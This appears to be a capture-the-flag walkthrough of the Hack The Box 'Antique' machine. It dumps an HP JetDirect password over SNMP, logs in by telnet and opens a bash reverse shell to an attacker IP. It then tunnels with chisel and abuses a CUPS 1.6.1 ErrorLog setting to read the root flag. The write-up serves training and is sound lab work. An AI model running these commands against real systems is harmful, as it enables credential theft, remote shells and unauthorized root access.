Enumeration
I run nmap and found the port 23 open.
┌─[]─[user@parrot]─[~/htb/antique] └──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.106.56 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) ┌─[user@parrot]─[~/htb/antique] └──╼ echo $ports 23 ┌─[user@parrot]─[~/htb/antique] └──╼ nmap -sC -sV -Pn -p$ports 10.129.106.56 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 11:00 BST Nmap scan report for 10.129.106.56 Host is up (0.038s latency). PORT STATE SERVICE VERSION 23/tcp open telnet? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: | JetDirect | Password: | NULL: |_ JetDirect
User flag
A quick search on google reveals that HP JetDirect is a printer, and a vulnerability: CVE-2017-2741.
Searching more about this vulnerability and how to exploit it, I found this page that explain how to hack a HP JetDirect printer, and dump the password.
First I confirm that SNMP is running in the port 161/udp:
┌─[user@parrot]─[~/htb/antique/exploits] └──╼ sudo nmap -sV -sC -sU -p161,162 10.129.106.56 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 13:00 BST Nmap scan report for 10.129.106.56 Host is up (0.039s latency). PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server (public) 162/udp closed snmptrap
SNMP v1 is running, so I tried to dump the password executing the command that appears on the web page linked above:
┌─[user@parrot]─[~] └──╼ snmpget -v2c -c public 10.129.106.56 .1.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
It seems that the command has worked and has dumped the password in hexadecimal. I converted the hex code to ascii using the xxd command, you can use any hex/ascii converter online, or cyberchef, is just personal preference.
┌─[user@parrot]─[~] └──╼ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
Now that I know the password, I connected via telnet and I got the user flag:
┌─[✗]─[user@parrot]─[~/htb/antique] └──╼ telnet 10.129.106.56 Trying 10.129.106.56... Connected to 10.129.106.56. Escape character is '^]'. HP JetDirect Password: P@ssw0rd@123!!123 Please type "?" for HELP > exec whoami lp > exec ls telnet.py user.txt >
Root flag
For commodity I want a real shell, so let’s execute a reverse shell on the target.
> exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/4444 0>&1'
I receive the shell on the netcat listener and upgraded it:
┌─[user@parrot]─[~]
└──╼ nc -lnvvp 4444
[...]
lp@antique:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ export TERM=xterm
export TERM=xterm
lp@antique:~$ ^Z
[1]+ Stopped nc -lnvvp 4444
┌─[✗]─[user@parrot]─[~]
└──╼ stty raw -echo; fg
lp@antique:~$
After running linpeas.sh I found the port 631 in open for the localhost:
╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 1149/python3 tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp6 0 0 ::1:631 :::* LISTEN -
There are other vulnerabilities for priv esc, like the sudo version or polkit (CVE-2021-4034), but the machine creator probably wants us to explore the port 631, so let’s do that.
I downloaded chisel, a tool that will let us setup a tunnel to the target machine. I first downloaded the binary and copy it to the target machine:
┌─[user@parrot]─[~] └──╼ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz [...] ┌─[user@parrot]─[~] └──╼ gunzip chisel_1.7.7_linux_amd64.gz [...] ┌─[user@parrot]─[~] └──╼ python3 -m http.server 8080 # download it on the target lp@antique:~$ wget http://10.10.14.93:8080/chisel_1.7.7_linux_amd64 [...]
Not that the target has the binary, I will create the tunnel. First I opened a chisel server on my machine:
# on my machine ┌─[user@parrot]─[~] └──╼ ./chisel_1.7.7_linux_amd64 server -p 9000 --reverse
This way chisel server will listen on the port “9000”, the –reverse flag will allow for reverse tunnels, so that a client can open a listening port on our machine. So now I will connect the target:
# on the target lp@antique:~$ ./chisel_1.7.7_linux_amd64 client 10.10.14.93:9000 R:9001:localhost:631
On the client side (target), we are telling chisel to connect to our machine “10.10.14.93:9000”, and to create a listening on my machine in the port 9001 “R:9001:localhost:631” (reverse tunnel). This way any traffic my machine hits on the port 9001 will be forwarded by chisel to the target machine, and send to port 631 on target from target.
Now we can connect to the web page by searching for “localhost:9001” on our browser.
The target is hosting CUPS, an open-source printing system. I also notice the CUPS versions is 1.6.1.
I search for vulnerabilities of CUPS 1.6.1, and found this page where a Root File Read vulnerability is explained.
It says it is necessary to be in the “lpadmin” group to exploit this vulnerability, so I checked if the user lp, is in that group.
lp@antique:~$ groups lp lpadmin
The user is in the “lpadmin” group, so I’m able to exploit the vulnerability from this user.
This vulnerability consist in changing the ErrorLog path, because when we visit the error log page on the web, the cupsd daemon (running with setuid root) reads the Error Log path and echoes it as plaintext. I will try to change it to the root flag and make CUPS echo that file.
I searched on metasploit and found this module. Taking a look at it I notice it runs the following command to change the Error Log file:
lp@antique:~$ cupsctl ErrorLog=/root/root.txt
Next, the exploit makes a request to the web interface. The web interface will show the Error Log file content, so I can make a request with “curl”, and check the output:
lp@antique:~$ curl http://localhost:631/admin/log/error_log b6791365258a05b70f09ec24e27630de
Cool! That’s the flag! 🙂